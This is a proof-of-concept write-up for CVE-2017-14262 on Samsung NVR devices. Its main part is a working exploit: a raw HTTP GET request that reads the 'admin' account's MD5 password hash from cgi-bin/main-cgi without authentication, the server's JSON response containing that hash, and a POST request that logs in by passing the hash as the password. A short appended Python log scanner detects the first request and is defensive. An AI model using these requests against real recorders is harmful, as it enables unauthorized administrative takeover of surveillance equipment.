CVE-2017-14262 PoC — Samsung NVR device security vulnerability

Associated Vulnerability
Title: Samsung NVR device security vulnerability (CVE-2017-14262)
Description: On Samsung NVR devices, remote attackers can read the MD5 password hash of the 'admin' account via certain szUserName JSON data to cgi-bin/main-cgi, and log in to the device with that hash in the szUserPasswd parameter.
Readme
# Samsung_NVR_vul

## CVE-2017-14262
## xfuturesec Co., Ltd

### First, get the MD5 password hash of the 'admin' account.

Send:  
GET http://192.168.1.14/cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin","szUserName":"","u32UserLoginHandle":0} HTTP/1.1  
Host: 192.168.1.14  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Connection: keep-alive  

Recv:  
HTTP/1.1 200 OK  
Content-Type: text/html;CHARset=utf-8  

{  
	"szUserName":	"",  
	"szLoginPasswd":	"e10adc3949ba59abbe56e057f20f883e",  
	"au32LoginPasswd":	[13423221, 5515125, 6390751, 4733341, 12838108, 13423221, 5515125, 6390751, 10132668, 371291, 12838108, 13423221, 5515125, 10132668, 371291, 13423221, 10132668, 371291, 0, 0],  
	"u16UserPermissionCnt":	1,  
	"u8UserRole":	0,  
	"u8UserBasePermission":	255,  
	"u16UserExtralPermissionCnt":	1,  
	"u32UserLivePermission":	[4294967295],  
	"u32UserPTZPermission":	[4294967295],  
	"u32UserVODPermission":	[4294967295],  
	"u32UserRecordPermission":	[4294967295],  
	"u32UserLocalBackup":	[4294967295], 
	"code":	0,  
	"success":	true  
}  

"szLoginPasswd":	"e10adc3949ba59abbe56e057f20f883e" is the MD5 hash of the 'admin' account's password.  

We now have the MD5 password hash.


### Second, log in to the device with that MD5 hash.

Send:  

POST http://192.168.1.100/cgi-bin/main-cgi HTTP/1.1  
Accept: text/html, application/xhtml+xml, */*  
Referer: http://192.168.1.100/  
Accept-Language: zh-CN  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding: gzip, deflate  
Connection: Keep-Alive  
Content-Length: 246  
DNT: 1  
Host: 192.168.1.100  
Pragma: no-cache  

lLan=0&szUserName=admin&szUserPasswd=e10adc3949ba59abbe56e057f20f883e&szUserPasswdEx=%5B6477625%2C24215867%2C12838108%2C11382568%2C7503741%2C7198498%2C24215867%2C7503741%2C7198498%2C23345327%2C7198498%2C10192199%2C23345327%2C7198498%2C10192199%5D

szUserPasswd=e10adc3949ba59abbe56e057f20f883e is the MD5 password hash read in the first step.

We are now logged in to the device as the 'admin' account.
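
A defender-side check for the first request above, added here as an example (not code from the original README): it flags log entries where `cgi-bin/main-cgi` receives a `cmd` 201 query carrying `szUserName_Qry` with an empty `szUserName` and a zero `u32UserLoginHandle`. The log line layout, the function names and the reading of those two fields as "no login session" are assumptions.

```python
import json
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/cgi-bin/main-cgi"
USER_QUERY_CMD = 201  # cmd value in the account query shown on this page

# Constructed sample log, one request per line: "client method target status".
SAMPLE_LOG = [
    '192.0.2.10 GET /cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin",'
    '"szUserName":"","u32UserLoginHandle":0} 200',
    "192.0.2.11 GET /cgi-bin/main-cgi?json=%7B%22cmd%22%3A201%2C%22szUserName_Qry"
    "%22%3A%22admin%22%2C%22szUserName%22%3A%22%22%2C%22u32UserLoginHandle%22%3A0%7D 200",
    '192.0.2.20 GET /cgi-bin/main-cgi?json={"cmd":201,"szUserName_Qry":"admin",'
    '"szUserName":"admin","u32UserLoginHandle":7731} 200',
    "192.0.2.30 GET /cgi-bin/main-cgi?json={not-json 200",
    "192.0.2.40 GET /index.html 200",
]


def is_sessionless_user_query(target):
    """True if a request target is the account query sent without a session."""
    parts = urlsplit(target)
    if not parts.path.endswith(ENDPOINT):
        return False
    # parse_qs percent-decodes, so raw and %22-encoded JSON are both handled.
    for raw in parse_qs(parts.query).get("json", []):
        try:
            body = json.loads(raw)
        except ValueError:
            continue  # malformed JSON is not this query
        if not isinstance(body, dict):
            continue
        if body.get("cmd") != USER_QUERY_CMD or "szUserName_Qry" not in body:
            continue
        # Assumption: empty szUserName plus zero u32UserLoginHandle means the
        # caller holds no authenticated session.
        if not body.get("szUserName") and not body.get("u32UserLoginHandle"):
            return True
    return False


def scan(lines):
    """Return client addresses that sent a session-less account query."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) == 4 and is_sessionless_user_query(fields[2]):
            hits.append(fields[0])
    return hits
```

Any hit on a device that has not been patched or isolated is a reason to treat the 'admin' password as exposed and rotate it, since the hash alone is accepted at login.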